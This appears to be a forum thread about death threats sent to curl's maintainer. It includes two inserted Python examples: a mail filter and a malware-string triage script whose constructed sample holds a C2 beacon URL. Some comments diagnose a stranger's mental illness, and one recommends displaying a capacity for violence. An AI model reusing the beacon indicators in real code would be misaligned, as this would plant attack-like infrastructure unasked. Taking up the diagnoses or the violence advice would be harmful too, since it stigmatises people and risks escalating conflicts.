The general demeanor of that person, some of the lingo used like "rooting" or "federal server hijacking", the fact that in the screenshot he's using some text editor with ads in it to browse the offending code combined with the fact that he doesn't know what Curl is (if he did he wouldn't have sent this e-mail) screams "script kiddie" to me.
I'm not sure whether this person is actually responsible for a multi-million dollar defense project, but if he really was, it's probably a good thing he lost the deal because I definitely don't want that kind of person managing such a project.
We are dealing with a person with mental illness, because nothing is coherent. It's all made up. That's why you don't answer that kind of mail, the goal is to trigger a reaction from you.
I think it's the opposite, I think it's an unqualified contractor writing code he doesn't understand for complex systems and was subsequently hacked. I see this a lot with people bidding on contracts then hiring staff/developers after it's awarded to duct tape a system together that barely works and is full of holes.
I'm personally not very well-known, but I work for someone who is, and on a project that gets quite a lot of attention because of it. It's surprisingly common that people show up with extraordinary and incoherent stories. Given the author's name and email address are plastered all over, it is not surprising that such people would find him too.
This. The world is full of incompetent people winging it, and the competent ones are busy putting out the fires they left behind. It takes 3000 years to build a Ming vase, but only a kid playing soccer to destroy it.
Making a mess is a low effort endeavour.
Cleaning it up might as well be 1/99 of your lifetime. Tech projects are asymmetric warfare between the business side supporting the "cheapest" project approach and engineers allowed to clean it up properly only after the sunk cost fallacy trapped the clueless.
> - a solid (but wildly misplaced) basis in reality
Can you explain this more? I recognize some traits of these in me and my siblings, but we're not on meth at all... so I find the psychological flaws interesting.
You bet, and thanks for your condolences. In short, almost certainly this doesn't apply to you.
The pattern is that in these scenarios, usually the people are quite intelligent and often accomplished. This gives them a repository of valid phrases and concepts to draw upon to breathe legitimacy into their boogeymen. The evidence they present, however, is completely benign. That person, however, has quite the story they think is proven. It's literally as if they're showing you a basic electronic device w/ the cover removed and that proves all sorts of maliciousness.
Attempting to argue back is completely ineffective and even if you "win" one point, they'll quickly shift to another and nothing sticks, especially not the next time you talk to them.
I wouldn't even remotely compare this to more commonly contested topics like differing religious/political/social views, even at the extreme. This involves a visceral fear that >you< are actively being attacked, not some nefarious shadow with a grand plan.
In my experience... a characteristic of this type of condition is a tendency for the brain to make connections too eagerly, and to jump to conclusions. His computer did something weird, therefore it must have been hacked. He heard about the Solarwinds breach in the news, therefore it must be related. He opened some files and saw Daniel's name, therefore he must be responsible. And so on.
It really is what my father does. We're very analytical on his side of the family. We're also prone to a narrow view; when we have 'attacks' we make huge numbers of logical connections that explain (or try to) what we suppose is happening, and it's near impossible to deal with us until the storm is over. A kind of paranoid burst. Maybe not to the extent of your friend, but from your words it's really similar.
Have you ever spoken to a professional? Even if you don't feel like anything is wrong, it can be good to know yourself better. And if anything, potentially face an aspect of yourself that may otherwise surprise you later in life.
I have a very clear idea of what spectrum we're talking about here, but maybe it's better left unspecified to not influence too much (:
This is the sort of magical thinking that can be a symptom of paranoia, the unfortunate combination of extreme anxiety and a disengagement from realistic thinking. The person clearly does not know what Curl does and simply lashed out like a wounded animal at the first thing that caught his attention.
Bingo! It reads very similar to the GitHub repo of an insane person that was posted here about a year ago. The one where I think he/she talks of special agents and has a bunch of random files with random stuff in them.
Have you ever sat down and had a long, and deep conversation with someone suffering from severe paranoid schizophrenia after they've experienced a psychotic break?
I assure you, you will quickly understand the difference.
Especially if that someone is your previously un-diagnosed friend and business partner.
I am pretty sure they are not even a script kiddie... they are just a fairly immature troll.
Not sure what caused the original email, but the reply is just a copy/paste of various unrelated things and security incidents that the person Googled without even understanding enough about them to form a comprehensible narrative.
Which tells me they are simply trying to get a rise out of someone.
The way the grammar is constructed I would not be surprised if this came from a pre-teen.
I've been in the government contracting space for about six months but those emails look to me to be about the level of competency I'm seeing with many of my colleagues. Spaghetti code with no unit tests and nobody knows how to use a debugger, let alone a profiler. Getting irrationally mad at open source devs for making changes as if they were supposed to keep the Jira tickets they were working on in mind specifically. Lack of ownership. Finger pointing. This looks quite real to me.
A better analogy is a screwdriver. He made a screwdriver. Screwdrivers have millions of legitimate and essential uses. How would you build anything without one? But a criminal could also use the screwdriver to open stuff he's not supposed to. Blaming the screwdriver manufacturer for that is pointless.
Trolls prefer to use public fora in order to upset the greatest number of people possible. They don't target individuals through private correspondence.
I agree; this seems like someone with so little technical ability that I wouldn't be surprised if he did manage to talk someone into buying a multi million dollar defense project he could not deliver...
> I lost my family, my country my friends, my home and 6 years of work trying to build a better place for posterity.
I get losing your family / home / friends, but a country? Where did that go?
This sounds like the result of unscrupulous "boot camps" that are common in countries like India - people are told if they sign up and pay $life_savings they can become a programmer and be hired by "The US Government" or other companies for enormous amounts of money.
A mundane class is offered with impractical advice and they're left with no money, little skills, and spamming the internet trying to get "their contract" - and if it doesn't materialize and they go back to the boot camp to complain the scammers blame it on "curl" - see the haxx.se domain? Clearly a hax0r ruined your chance at a better life.
My bet is on GPT-2 (GPT-3 would probably generate better text). This whole reply just isn't coherent (first it's a defence contract, then it's learning software for kids?).
So either AI generated or someone with some mental illness.
Gov contracting is an ecosystem on its own and those that figure out the bureaucratic hoops can survive a long time without needing much technical knowledge. Some of those individuals lose touch with what is going on outside of the defense industrial base.
It might be he did, or was planning to do, a bid on a government project that wouldn't have stood a chance in hell, but he already imagined he was going to win that bid. And then stuff happened and he felt cheated out of his chance.
Some context: Daniel is the primary maintainer of curl (the ubiquitous utility and library for HTTP requests) [1]
His name often shows up in the licensing disclosures/attributions of applications that include curl.
The general opaqueness of modern software leads people to latch onto him and his email for all manner of things, and for non developers to attribute to him all sorts of bad motives ("You hacked me!").
This is especially unfortunate as Daniel has been such a genuinely positive and helpful face to a popular open source project. I feel awful that his generosity gets repaid with this kind of crap.
That's the exact reason why I don't leave my real information anywhere on public web. Or at least try not to.
Weird that people spend each day on Facebook and Reddit among unhinged bozos, and still fail to realize how it might not be the best idea to spam their name and location on the web for all to see.
> This is especially unfortunate as Daniel has been such a genuinely positive and helpful face to a popular open source project.
I can't agree more, Daniel is one of the friendliest, most approachable maintainers out there. Several times he takes time to answer menial questions and is friendly about it. I recommend the curl mailing list if you work with it in any manner, as you will learn a lot from other people.
I wonder if Daniel would have received less unwanted correspondence if he had set up some kind of a foundation/shell for curl's IP from an early stage.
I'm sorry to hear that. libCurl is great and my life is better for it.
It's really best to not reply to the mentally ill people (and you can be pretty sure anyone sending something like the first is at least temporarily mentally ill).
It can sometimes be extremely tempting, I know-- especially when they've managed to say something almost perfectly constructed for pithy comeback. But it will not help you and it will not help them. If it does anything it will just encourage the behavior.
If it is any consolation lots of other people receive nasty kookmail messages -- I know first hand, in addition to the ones I get directly some of the kooks like to send massive carbon copy blasts-- as a result I have a bunch of very strange mail rules, like discarding any email that copies both a whitehouse.gov email address and Jeff Bezos, or another if both George Soros and Noam Chomsky are copied.
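The "discard anything that copies both X and Y" rule described in the comment above is a recipient co-occurrence filter. The following is an added example of how such a rule can be implemented, not code from the original post or from any project mentioned here; the rule pairs, the `jeff@example.com` and `daniel@example.se` addresses and the two sample messages are all constructed for illustration (only the whitehouse.gov domain comes from the comment).

```python
"""Recipient co-occurrence filter for mass-CC kookmail (added example, constructed data)."""
import email
from email.utils import getaddresses

# Hypothetical rule set: a message matches when BOTH members of a pair appear
# among its recipients. An entry starting with '@' matches a whole domain.
KOOK_RULES = [
    ("@whitehouse.gov", "jeff@example.com"),             # placeholder for the Bezos address
    ("george.soros@example.org", "noam.chomsky@example.edu"),  # placeholders
]

RECIPIENT_HEADERS = ("to", "cc", "bcc", "resent-to", "resent-cc")


def recipients(raw_bytes):
    """Return the set of lower-cased addr-specs found in all recipient headers.

    getaddresses() handles display names, angle brackets and comma-separated
    lists, which a naive substring match on the raw header would get wrong.
    """
    msg = email.message_from_bytes(raw_bytes)  # compat32 policy: headers are plain str
    headers = []
    for name in RECIPIENT_HEADERS:
        headers.extend(msg.get_all(name, []))
    return {addr.lower() for _, addr in getaddresses(headers) if addr}


def _matches(pattern, addrs):
    """Domain pattern ('@example.org') or exact addr-spec match."""
    if pattern.startswith("@"):
        return any(a.endswith(pattern) for a in addrs)
    return pattern in addrs


def matched_rule(raw_bytes, rules=KOOK_RULES):
    """Return the first rule pair whose members both appear as recipients, else None."""
    addrs = recipients(raw_bytes)
    for a, b in rules:
        if _matches(a, addrs) and _matches(b, addrs):
            return (a, b)
    return None


# Constructed sample: a mass-CC blast that the rule should catch.
SAMPLE_BLAST = b"""From: concerned.citizen@example.net
To: press@whitehouse.gov, Jeff Bezos <jeff@example.com>
Cc: daniel@example.se
Subject: URGENT: they are all in on it
Content-Type: text/plain; charset=utf-8

The HTTP library is the key to everything.
"""

# Constructed sample: an ordinary message copying only one member of a pair.
SAMPLE_NORMAL = b"""From: colleague@example.com
To: daniel@example.se
Cc: press@whitehouse.gov
Subject: re: interview request

Thanks again for your time.
"""

if __name__ == "__main__":
    for label, raw in (("blast", SAMPLE_BLAST), ("normal", SAMPLE_NORMAL)):
        print(label, "->", matched_rule(raw))
```

In practice a matched message is better quarantined to a folder than silently discarded, so that a false positive (a legitimate thread that happens to copy both parties) can be recovered, and the matching rule is worth logging so the rule set can be tuned over time.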
I never got more hate mail than when I tried doing outreach for my physics group. It did include death threats (I think); it was hard to tell if I was being accused of being part of a modern inquisition that burned people at the stake, or should be burned at the stake, or both.
Another good time was when I was running a crypto meetup and we had to call the cops because someone came in naked, the CIA had put chips in their clothes and they had to burn their house down so they weren't homeless but on the run.
This is not directed at you specifically, but your comment got me wondering how many people contact individuals like Daniel who are behind Open Source projects like this to share positive feedback, or even just to say "Thank you." I know I've not done it anywhere near as much as I should, and I suspect that doing so would help take the edge off what can often feel like a thankless task.
I imagine it's a bit like reviews: people with a bad experience are more likely to leave a review. Perhaps the best way to help people like David is to stop once in a while and thank them for the things they've done.
I can answer this a bit - I maintain Yarn, a JS package manager. While nowhere near Curl, it does have a fairly significant user base - at least a few million devs, from what I understand. For all this work, I received exactly two emails thanking me for my work during the past four years.
I also happen to maintain a little "Secret Santa" website, hosted on a GitHub page. Nothing too fancy, just a static app that lets you manage a Secret Santa without creating accounts. Well, every year, I receive 3-4 emails thanking me for creating it, which is even more surprising considering they often come from people that aren't from the tech world at all.
Perhaps for my happiness I should invest more in this side project than in a package manager used across the globe :)
First of all, thank you for your work for the community. But I want to put things in context too. I am primarily a backend engineer who works on an Ubuntu box and uses many Unix tools while maintaining a huge service containing hundreds of OSS libraries. You can imagine that if I have to thank every one of them then I won't be able to do my real work. Also I don't think someone like Mr. Torvalds would appreciate me adding more noise to his inbox because of my garbage email ;)
Also wanted to chime in here and say thank you for maintaining Yarn. I don’t use js often but yarn has always been my preferred tool when I do. Great to know that it has an awesome maintainer like you
> how many people contact individuals who are behind Open Source projects just to say "Thank you."
Open-source developers occasionally express dislike of "thank you" messages. They may have written that software mainly to scratch their own itch, and dealing with messages that don't say anything but thanks takes precious time out of their day. Donating money, however, is usually more welcome.
That hasn't been my experience, somewhat the opposite since people who donate money sometimes turn weird and controlling (even over pretty small amounts).
One can send thanks along with "No response expected or required!" :)
My social media bubble is one that comparatively spends a lot of thought on maintainer/contributor appreciation, and I've literally never heard that complaint.
No open source maintainer is so busy that they don't have the time to respond to an ever so rare genuine thank you with a "Thanks, glad you appreciate it!".
I can kind of understand where they're coming from. I've had people create issues or leave comments on random commits for the sole purpose of expressing thanks, which can get annoying in a bigger project. Especially when there are a few hundred people watching the repository that now each receive multiple emails they aren't interested in. That said, I still do appreciate people taking the time to express thanks when opening an issue or when I have helped them with a problem.
Yes, there are obviously some ways to express gratitude that are preferable to others, but as long as the entitled/ungrateful/"you are _supposed_ to do things this way" comments outnumber the thankful ones, I won't start complaining about them.
I've written one small open source library, which I publicized a little bit back when I first released it. Like you said, I wrote it mostly to scratch my own itch, but it was really nice to see it get some use out in the wild, and I have gotten a few emails about it over the years. Personally, I really enjoy getting any kind of emails about it from people who are using it or who have questions. (To be fair, I've never gotten the murdery emails about it.)
> It's really best to not reply to the mentally ill people
This IMO is the best way to deal with a lot of emails. I have some public software that is literally innocuous, and yet occasionally I get some very angry emails. An example: a small game where people think the game/computer is cheating (it's not).
If someone fires off an angry, irrational email to you, they aren't looking for a rational response - they are looking for a debate, or a fight, or an outlet. It's best to let them move on.
Thanks everyone for the positiveness and expression of appreciation I've sensed here. The threat has been reported to the police and I'll move on. I love you all. Now I'll go back and continue working on curl.
Thank you for your useful project and sorry you have to deal with this. Consider reporting to US authorities as well if you have not done so, (or wherever you think the threat may have originated from).
This feels to me like a person with some sort of mental illness or breakdown and delusions of grandeur and persecution. Their explanation doesn't make much sense. If I were Daniel, I wouldn't respond any further.
Sounds like someone who's developed a prototype which they had grand plans of selling for billions, which then got easily hacked because they don't understand security
The $15k figure implies that's either a bill the hackers ran up on an AWS instance or what they valued their development at
Edit: The blackmail line sounds like a ransomware attack
I disagree. I think this person may not have necessarily programmed anything serious before in their life. Or if they have, probably not a defense project.
If you read the follow-up emails - and apologies for the armchair psychiatry - I think this person is very likely in a psychotic state. Their messages sound very similar to what you find in the "BadBIOS" and other "gangstalking" communities. It's not really tethered to reality.
I think it's extremely likely the author is not a troll and possesses a sincere and high-confidence belief that powerful entities are tracking and persecuting him and that backdoors in lots of software, including curl, were placed by sinister organizations and used to facilitate spying on and attacking him. The software is perceived as a WMD or pathogen partly responsible for this incursion into his life and the damage he thinks has resulted. He's mad because he thinks Daniel is like the mayor of Flint, MI: the water is poisoning people and he's doing absolutely nothing about it. Of course you'd be angry!
This is why it's generally best to not reply to messages as extreme as these. Daniel will never be able to convince him he isn't actually the metaphorical Flint mayor. You just get sucked into a world that's very real to them and not real to you or almost anyone else. It's not possible and not a good idea to try to reason with someone like that.
Yeah, I agree. In his place, I either would have done nothing, or, maybe made a police report (not that I'd expect the police to actually do anything at this stage). Generally speaking, the less you antagonize someone whose first exchange with you is "I will slaughter you," the better, IMO.
I once tried to have a conversation with a woman who tried to drive me and my bicycle off the bus lane (where she shouldn't be driving in the first place) and shouted "fuck off you pissy little cunt" at me. For some reason I thought that if I explained my perspective, she would understand.
It ended up with a broken back wheel (she kicked it) and a damaged phone (she took it out of my hand when I wanted to take a picture of the license plate and threw it on the ground).
She was clearly unhinged, but I was stupid as well. I should have just let it go; no one who starts a social interaction with "pissy little cunt" is likely to be calmed down by reason. You have nothing to gain from trying, and much to potentially lose.
> ...and shouted "fuck off you pissy little cunt" to me.
There's a name for this incident - "road rage". Very real and dangerous indeed.
People get completely irrational and agitated. Probably due to effect of being locked up, in a way, non-free inside their cars.
When I'm biking, at times I too get mad at some careless and obnoxious drivers encroaching on my freedom; I guess they may be finding me just as annoying for simply missing the fatter wheels and a comparable scale on the shared road. Irrational!
As cyclists we are literally more exposed on the road. So whenever such an inevitable bout of irrational fury pops up, I find the safest option for myself is to steam off using similar vocabulary. It's more efficient than reasoning with the unreasonable.
Just to be even safer, I'd let the offending four-wheeled furia be gone before naming the whole piece of that motorized content in precisely spoken choice of words...
A sad sentiment of giving up, but I think it is premature to abandon your approach. I think it may be worth trying for that small-ish fraction (call it 10%?) of people who can be talked back from their anger. Those are good conversations to have for both parties, and worth trying to have, even if it results in failure 90% of the time.
That said, I think the real lesson for you is: don't make yourself more vulnerable (e.g. letting her touch you or your stuff) if you decide to try to start a conversation!
It also points to a theory I've been considering about personhood, and how people like your driver lady are in a mind state where, in her mind, you're not a person. It's a very, very dangerous situation, because if they don't think you're a person, then there is nothing immoral about saying or doing anything to you, including violence.
> I think the real lesson for you is: don't make yourself more vulnerable (e.g. letting her touch you or your stuff) if you decide to try to start a conversation!
I didn't "let" her, she just did it.
I know you mean well and that you probably didn't intend it like this, but this comment comes off as victim blaming quite a bit.
As for the rest: thus far I've never managed to talk random strangers down from these kinds of rages; but maybe I just don't have the charm *shrug*. Last time I tried was with my neighbour and he ended up calling the police three times over a four-day period on me. My crime? I kindly asked him to not play his music so loudly all day long at the start of the lockdown (especially at 7am) and didn't back down when he tried to shout me away. I had "invaded his home" by knocking on his front door... This isn't a fit of anger, some people are just like this.
Yeah, had a neighbour lady like this recently. She was always closing her doors VERY loudly (lamps in my apartment were ringing) and when there was some argument with another neighbour, she eventually said that it was I who started banging doors. My best comparison for arguing with such people is like playing chess with a pigeon. It will throw off pieces, shit on the board and be happy that it won. And you will be appalled that it didn't follow any rules, angry maybe, but is there any use to all that arguing? They will bring you down emotionally and then you only argue to have a feeling of winning. No substantive discussion whatsoever. In such situations, just remember that arguing with them will NOT have any utility or lasting value, it will just waste your time and mental health.
I've recently had an interaction of similar character with a neighbor in my very small apartment building, including, oddly, a door slamming component. We had had an interaction a few weeks prior that just went sideways, which caused this woman to slam her door every time I would walk past it. Since walking past her door is not optional if I want to leave my apartment (small apartment building, remember?), and this door slamming tended to startle my dog, I asked her to stop.
Because the earlier interaction I mentioned went sideways (including, among other things, her literally getting within 4 inches of my face while she was not wearing a mask), I decided to video record this most recent interaction on my phone so I would have evidence if anything went wrong that I could take to the landlord. I knew this would create an inherently more antagonistic vibe, but I felt like I had no choice after the prior incident.
Let's just say this interaction also went bad, culminating in a very minor physical assault (I was not injured -- she slapped the hand I was holding my phone in, because she did not like the fact I was recording), and a restraining order.
End of story, right?
Wrong. That restraining order, it was taken out by her against me. Her petition filing is literally nothing but gaslighting trying to paint me as the aggressor when I literally have video evidence to the contrary.
Unfortunately, due to COVID shenanigans, the court date was delayed a couple of times, and I ended up not being served notice of the actual hearing, which means I lost in a default judgement. I filed a motion to terminate her restraining order and a counter petition of my own, both of which I am currently waiting on a hearing for.
And, like your situation, because it was a neighbor, and because I have to walk past her door to get to and from my apartment, I simply don't have the choice to not interact with this person. Basically anything I could have done would be a lose / lose. Rock, meet hard place, I guess. Le sigh.
I am not blaming you. I am trying to point out places where you could have reduced the chance of being harmed. In particular, when she approached you and came within arms length, you could have put away your phone. Next time, I hope you do. That is NOT the same as saying it was your fault she destroyed it. It is her fault. My advice is based on the sad truth that the cost of getting justice >> the cost of buying a new phone, so I'm saying: when confronted with an angry person, put your valuables away, because getting them to actually replace that item will be more pain than the initial damaging interaction.
As for your neighbor, yes, it sounds like he's a crazy person. And the lockdown has taken even moderately crazy people and pushed them over the edge!
My guess would be that you're too peaceful and it shows.
There are some people who will try to bully their way through life. They will apply violent behavior (e.g. breaking your phone) to get their way. The way to stop that is to make it clear that you can apply violence, too.
Most of society works by peacefully interacting with each other. But it is crucial that everyone knows that there is a threat of violence (e.g. the police) to keep everyday life peaceful.
I wonder if I am just imagining it, but I took martial arts lessons as a kid. I've always felt like just the knowledge that I could fight has caused others to deescalate and be respectful.
Well that only works with people that are not afraid of fighting you and possibly winning against you - and there's always somebody that's better trained and/or stronger than you.
When you encounter that kind of person, if you challenge them, they will step up and fight you, because they will feel they have no other choice. Reasons could range from pride, (imagined) loss of (self) respect to just being aggressive bullies that enjoy hurting other people.
Of course if you're 6'7'' and 240 lbs not a lot of people would want to start arguing with you in the first place.
It's tautologically true that for any X, if you don't try to do X, you won't succeed. But, you also have to weigh whatever good may come of success against the probability and potential consequences of failure. In cases like these, you're by definition dealing with someone who is a little off mentally, whether that's just a temporary condition (e.g. having a bad day), or serious mental illness. Such people can tend to be unpredictable as a result, which is dangerous in its own way.
So, yes, I agree with you somewhat, but I think the balance of consequences tends to favor not acting in cases like this rather than attempting to do anything.
>A sad sentiment of giving up, but I think it is premature to abandon your approach. I think it may be worth trying for that small-ish fraction (call it 10%?) of people who can be talked back from their anger. Those are good conversations to have for both parties, and worth trying to have, even if it results in failure 90% of the time.
Please do not give terrible advice that will kill people.
Moving to NYC a couple of years ago I learned the best way to deal with those types of people is to let go and move on.
It really isn't worth wasting your time and energy on those people, because they will just ruin your day. Best case scenario you feel better for a couple of minutes and then you forget about it. Worst case you end up dead, in jail or worse.
> maybe made a police report (not that I'd expect the police to actually do anything at this stage).
Indeed. But one shouldn't underestimate the chance that this wouldn't be the first report about this person. Lots of similar reports like this may actually cause them to do something.
I agree, in the sense that someone who has done something of this nature is more likely to have done such a thing in the past. However, in this case, the victim is someone who is being targeted through his email address, which is embedded in open source software that's contained in gazillions of systems worldwide. That makes it significantly less likely that whomever he would report this to would have gotten another report about this particular individual.
Yeah, I agree. There's probably not much they can do about it (and the individual will probably not end up taking any action), but in case he does, it's nice to have a police record of it all.
Publishing the emails is copyright infringement; I don't think it's any other crime. And good luck trying to get someone for copyright infringement when you're threatening them with “slaughter”.
Although in that case the city was not actually hacked. It looks like this person actually got hacked by someone using curl and he is complaining that curl made it possible. I wonder if he knows anything about the people who wrote the actual exploit(s).
A bit like the time the scientology lawyers were desperate to find out who was running that server at 127.0.0.1 that had all their files on it, and really really wanted to find the person who was using the 'majordomo' login so that they could depose them.
Woah, that should have been reported to the FBI as extortion. Through the (interstate) threat to report a crime falsely to the FBI, the extortioner successfully extracted a valuable service, viz. tech support, from the victim.
Many comments rush to label this guy as "mentally ill". Being an entitled asshole with misdirected anger is not necessarily a medical condition. And there are plenty of people with actual mental health problems who are not aggressive at all (statistically, mentally ill people are more likely to be victims of violence).
Health issues are a thing that happens to people, and they don't have control over it, which absolves them from responsibility for it. OTOH if the guy making these threats is just pissed off due to his own failures, or even is just a troll making it all up, he should be held responsible for his actions.
You're drawing a brighter line between mental illness and being an asshole than I would. There may be more grey area between absolution and being held responsible than you're allowing.
I'm not implying we shouldn't hold trolls responsible when they know better. From an outside perspective it would suck to have a brain that releases dopamine when causing others to suffer.
Precisely. The list of attacks (?) described in the email is an assemblage of meaningless phrases (like "favicon XML injection" and "JS stochastic Templating") and unrelated occurrences ("Solarwinds Oct/2020").
That kind of gibberish is actually a symptom of psychosis (thought disorder).
I've interacted with a few people with psychotic illness over the years (both in-real-life and online) and the distinctive language style is rather hard to miss.
This is the equivalent of sending death threats to the car company that manufactured the car that the robbers used to get away in after robbing your bank.
The problem is a common one, where someone reaches a conclusion after a sloppy investigation.
From the letter, it sounds like this guy had his life ruined, and upon investigating the hacker tools used to ruin his project and life, he jumped on the name that appeared the most in the source code.
The screenshots would have been an "I know it's you" message to him, which the sender would assume is more than enough to let him know the meaning of his email. And indeed, if Daniel had been writing haxx0r tools, the message and intent would have been crystal clear.
At this point the sender would be assuming that Daniel is just playing games with him and playing dumb, so he's pouring out his story to shame Daniel over the damage that his hacker tool has done.
If someone were to write tools specifically for evil purposes, and your life were ruined by use of said tools, you'd be screaming mad, too. And probably seeking revenge.
Except that his investigation was sloppy and incomplete; Daniel doesn't write hacker tools, he writes an HTTP client library. He's no more guilty of facilitating hacking than the writer of any runtime library's HTTP client code.
Normally, this would be a matter of setting the facts straight, but in this case a criminal investigation would probably be in order.
I think we all owe Daniel a certain amount of thanks for somehow, incidentally, maybe, preventing nutjob exhibit A from getting a multi million dollar defense project.
And anytime such unrealistic threats are made, this always makes it seem like maybe it's not so bad:
Sadly, no. V&V in defense projects are often short on evaluating security in any meaningful way. It’s mostly theater, show you ran a couple of security assessments or have a code review process that includes checking for buffer overflows and you’re fine.
Let's get our facts straight here. Does the Perseverance rover contain libcurl? It has ffmpeg, so, ... "on the planet" could be changed to "two planets in this system."
Seems like a death threat from an icloud.com address. Chances are the real name and location of the sender is available to the authorities (with consent by a judge) from Apple.
Relatedly, someone on the blog posted a comment that it might be more effective to report him to Apple than to turn a credible death threat over to law enforcement! Comments here seem to acknowledge that he's delusional, but he may very well have lost a huge contract. He claims he's lost family, friends, house, and can't go back to his home country. What would Apple's move be? To lock him out without warning or due process of any sort. I don't know about any of you, but I KNOW how devastating it would be to suddenly be locked out of MY iCloud account. Do we really think that getting Apple to deplatform him will somehow assuage his stated murderous intent?! What kind of cyberpunk megacorp police state future are we advocating for here? No, the answer is to report this to local LEO and the FBI, let THEM deal with Apple to get his details, and handle whatever comes next.
I wonder what the market is for a sort of super-it lawyer service, that affords the protections of legal counsel in order to secure your data across multiple platforms and protect you from deplatforming as you describe, where they can take YOUR data, and is protected by legal counsel so that it generally can't be deplatformed by governmental entities.
Encryption has a sort of brutal effectiveness at doing this if you distribute copies of your data, but it is hard to maintain and has exposure in extreme events with your health.
Encryption + distributed data + legal protections from counsel could be an offering. It might be a "big fish" service though.
I've seen the theme of "maintainer of popular open source product is threatened by person who doesn't understand it's just a component" show up a few times, but when I think about it most those times have been related to curl specifically. Maybe it's because of the domain haxx.se? Or maybe Daniel just writes about it a lot? Does this kind of thing happen so regularly to others?
It’s because curl and libcurl are used virtually everywhere, and clearly identified. This means in any problematic or malicious device or software, odds are good the first clearly identifiable thing you’ll find are references to curl.
Though the domain probably doesn’t help with the association. If you got hacked and the first clear string you find is “haxx.se” it’s not a big leap to interpret it as a taunt.
I'm guessing it is because people who create these hacking tools often need to do HTTP requests, so they just copy in libcurl source and before you know it Daniel's name is associated with all these tools and attacks.
'man curl' lists Daniel. I think morons that don't know what curl is only see the 'haxx.se' domain and think it's some hacker. It's sad that a person who's written a tool used by so many people and systems every day has to deal with nonsense like this.
The thing that confuses me about that faulty line of thinking is why would a hacker include a license under their name with the software they use to hack you? What sort of gentleman hacker would follow this legal procedure in the process of illegally compromising your machine? It would be as if a burglar stole all of your stuff but left you a contract so you could legally give them ownership. I just don't understand the reasoning.
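The sub-thread above is about why curl's name and domain are the first thing someone finds in a tool that hurt them. The script below is an added example (not from the thread, the curl project, or the blog post) of the triage step a responder would actually do: pull printable strings out of a binary blob and separate library markers (which only say what was linked in) from everything else (which is where the operator's own infrastructure shows up). The blob, the C2 URL, the path and the marker list are all constructed for the example.

```python
import re

# Constructed stand-in for a binary that statically links libcurl. Not a real
# sample; the beacon URL and the path are made up for this example.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"libcurl/7.64.1\x00"
    + b"https://curl.haxx.se/docs/http-cookies.html\x00"
    + b"curl_easy_perform\x00curl_easy_setopt\x00"
    + b"\x90\x90\xcc\x00"
    + b"http://203.0.113.9/c2/beacon\x00"
    + b"/tmp/.cache\x00"
)

# Assumed marker list for a couple of common embedded libraries. A hit here
# means "this library was compiled in", never "this library's author did it".
LIBRARY_MARKERS = {
    "libcurl": [
        re.compile(r"^libcurl/\d+\.\d+(\.\d+)?$"),
        re.compile(r"^curl_(easy|multi|url|mime)_\w+$"),
        re.compile(r"curl\.haxx\.se|curl\.se"),
    ],
    "openssl": [
        re.compile(r"^OpenSSL \d+\.\d+"),
        re.compile(r"^SSL_CTX_\w+$"),
    ],
}


def extract_strings(blob: bytes, min_len: int = 6):
    # Same idea as strings(1): runs of printable ASCII of at least min_len bytes.
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def triage(blob: bytes):
    # Bucket each string under the first library whose markers match it;
    # everything left over is what an analyst should look at for attribution.
    result = {"libraries": {}, "other": []}
    for s in extract_strings(blob):
        hit = next((lib for lib, pats in LIBRARY_MARKERS.items()
                    if any(p.search(s) for p in pats)), None)
        if hit:
            result["libraries"].setdefault(hit, []).append(s)
        else:
            result["other"].append(s)
    return result


def libcurl_version(blob: bytes):
    # The version banner libcurl embeds (also its default User-Agent prefix).
    for s in extract_strings(blob):
        m = re.match(r"^libcurl/(\d+\.\d+(?:\.\d+)?)$", s)
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    report = triage(SAMPLE_BLOB)
    print("libcurl version:", libcurl_version(SAMPLE_BLOB))
    for lib, strings in report["libraries"].items():
        print(f"embedded library {lib}: {strings}")
    print("strings worth investigating:", report["other"])
```

Run against the sample, the four libcurl strings (including the haxx.se URL) land in the library bucket and only the beacon URL and the staging path are left for the analyst. That split is exactly what the angry sender skipped.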
Unfortunately this is what a mental health problem looks like. Our society is ill trained to identify and deal with this category of heart breaking disease.
I mean he could just be a shitty person who's bad at their job? I think it's likely there's something wrong, sure, but sometimes I worry about this constant rush to associate bad behaviour with mental illness, when none of us are psychologists and we're certainly not that person's psychologist.
I'm not a psychiatrist, but it seems that this person has some severe psychotic disorder. The whole thing reads like a cheap knockoff of "A Beautiful Mind".
It doesn't read like that to me. It reads like someone who's an arsehole who had grand plans of their prototype being sold for billions and likely getting hacked for having no security knowledge
If you're looking for ways to be charitable, I found this (and this similar Tim Ferris post[0]) to be an eye-opening view into the range of noise that people with large social wakes deal with. It's a small slice of empathy that I (and possibly others) would have lacked otherwise that makes me more understanding in interactions with folks like OSS maintainers, corporate governance, etc.
I agree, there was no need to include names in the article.
When you get messages like this, sometimes you end up taking it differently to how it appears as a third party. Any threat of violence online can be interpreted as a joke, it's not easy to tell the difference sometimes and it's harder when you're on the receiving end of it.
If this hadn't been such a dangerous threat, I'd have replied like this: "oh I'm sorry, I'll refund you all the money you paid in licenses for curl specifically".
But, quite frankly, I'd go to the police immediately.
There's a valuable lesson in this: always reply! I wouldn't have dreamed of replying to an email like that, since I wouldn't expect to get any satisfaction from the sender. But incredibly he responded with what is probably more than enough info to secure a conviction, assuming he can be identified.
That comment made me think and I realized the following.
Open-source code like curl is inevitable when a society gains internet [1]. It's not Daniel's fault. If anything is to blame, blame the internet and human nature on a grand scale [2].
[1] If he hadn't made it, someone else would have. If no one else would, then people would've done it privately. Some of that code would've been leaked and popularized as an open source project (it's basic probability: many people would need to do it privately, since they have to if they want their CLI to interact with the web).
[2] There was an interview I read/heard somewhere where some Twitter employee said: if there is a 1 in a 500 million chance that something could happen based on a small piece of text, it means that at Twitter, it happens every day.
Assuming the person writing is not just having a nervous breakdown or trolling (~50%), I think the metaphor they're using is very useful here:
> You built a formula 1 race car and tossed the keys to kids with ego problems.
He may have been run over by a formula 1 race car, but for some reason he ended up writing to and blaming the guy that's building the seats. Or the tires.
Curl is a ubiquitous tool used for pretty much anything. Assuming the grievance is real, blaming it for anything is clearly a misunderstanding of the situation.
Uh... I mean, you don't really think that person has an accurate understanding of what actually happened? Because I'm having a hard time trying to imagine that. It's not that there aren't any vulnerabilities in curl that can be exploited that way, but I struggle to think of a situation where curl would have been an actual culprit. Also, it sounds like he thinks curl is something purposefully malicious.
